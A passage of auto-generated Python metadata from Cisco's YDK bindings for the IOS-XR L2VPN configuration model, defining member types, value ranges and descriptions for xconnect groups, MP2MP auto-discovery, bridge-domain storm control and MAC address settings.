'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
False,
[
_MetaInfoClassMember('remote-ceid-attachment-circuit', REFERENCE_LIST, 'RemoteCeidAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
[], [],
''' AC And Remote Customer Edge Identifier
''',
'remote_ceid_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
False,
[
_MetaInfoClassMember('ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Customer Edge Identifier
''',
'ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ceid-attachment-circuits', REFERENCE_CLASS, 'RemoteCeidAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
[], [],
''' AC And Remote Customer Edge Identifier
Table
''',
'remote_ceid_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
False,
[
_MetaInfoClassMember('ceid', REFERENCE_LIST, 'Ceid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
[], [],
''' Local Customer Edge Identifier
''',
'ceid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceids',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
False,
[
_MetaInfoClassMember('ce-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Customer Edge Identifier
''',
'ce_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ceids', REFERENCE_CLASS, 'Ceids' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
[], [],
''' Local Customer Edge Identifier Table
''',
'ceids',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable signaling protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable auto-discovery
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-policy', REFERENCE_CLASS, 'Mp2MpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
[], [],
''' Route policy
''',
'mp2mp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-targets', REFERENCE_CLASS, 'Mp2MpRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
[], [],
''' Route Target
''',
'mp2mp_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-signaling-protocol', REFERENCE_CLASS, 'Mp2MpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
[], [],
''' signaling protocol in this MP2MP
''',
'mp2mp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 26)], [],
''' Name of the multi point to multi point
xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-auto-discovery', REFERENCE_CLASS, 'Mp2MpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
[], [],
''' auto-discovery in this MP2MP
''',
'mp2mp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable control word
''',
'mp2mp_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'mp2mp_interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown this MP2MP VPWS instance
''',
'mp2mp_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpl2-encapsulation', REFERENCE_ENUM_CLASS, 'L2EncapsulationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2EncapsulationEnum',
[], [],
''' Configure Layer 2 Encapsulation
''',
'mp2mpl2_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpmtu', ATTRIBUTE, 'int' , None, None,
[('64', '65535')], [],
''' Maximum transmission unit for this MP2MP
VPWS instance
''',
'mp2mpmtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpvpn-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'mp2mpvpn_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
False,
[
_MetaInfoClassMember('mp2mp-xconnect', REFERENCE_LIST, 'Mp2MpXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
[], [],
''' Multi point to multi point xconnect
''',
'mp2mp_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the xconnect group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-xconnects', REFERENCE_CLASS, 'Mp2MpXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
[], [],
''' List of multi point to multi point xconnects
''',
'mp2mp_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-xconnects', REFERENCE_CLASS, 'P2PXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
[], [],
''' List of point to point xconnects
''',
'p2p_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups',
False,
[
_MetaInfoClassMember('xconnect-group', REFERENCE_LIST, 'XconnectGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup',
[], [],
''' Xconnect group
''',
'xconnect_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-control',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
False,
[
_MetaInfoClassMember('bd-storm-control', REFERENCE_LIST, 'BdStormControl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
[], [],
''' Storm Control Type
''',
'bd_storm_control',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-controls',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
False,
[
_MetaInfoClassMember('mac-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'mac_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('next-hop-ip', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Enable Static Mac Address Configuration
''',
'next_hop_ip',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
False,
[
_MetaInfoClassMember('member-vni-static-mac-address', REFERENCE_LIST, 'MemberVniStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'member_vni_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
False,
[
_MetaInfoClassMember('vni', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' VxLAN Network Identifier number
''',
'vni',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('member-vni-static-mac-addresses', REFERENCE_CLASS, 'MemberVniStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'member_vni_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
False,
[
_MetaInfoClassMember('member-vni', REFERENCE_LIST, 'MemberVni' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
[], [],
''' Bridge Domain Member VxLAN Network
Identifier
''',
'member_vni',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vnis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
False,
[
_MetaInfoClassMember('bd-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'bd_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'bd_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' Mac Address Limit Notification
''',
'bd_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('drop', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC address for filtering
''',
'drop',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filter',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
False,
[
_MetaInfoClassMember('bd-mac-filter', REFERENCE_LIST, 'BdMacFilter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
[], [],
''' Static MAC address
''',
'bd_mac_filter',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filters',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
False,
[
_MetaInfoClassMember('bd-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'bd_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'bd_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
False,
[
_MetaInfoClassMember('bd-mac-aging', REFERENCE_CLASS, 'BdMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'bd_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-filters', REFERENCE_CLASS, 'BdMacFilters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
[], [],
''' Filter Mac Address
''',
'bd_mac_filters',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-learn', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'bd_mac_learn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit', REFERENCE_CLASS, 'BdMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'bd_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-port-down-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable MAC Flush when Port goes Down
''',
'bd_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Mac Withdraw
''',
'bd_mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-access-pw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC withdraw on Access PW
''',
'bd_mac_withdraw_access_pw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
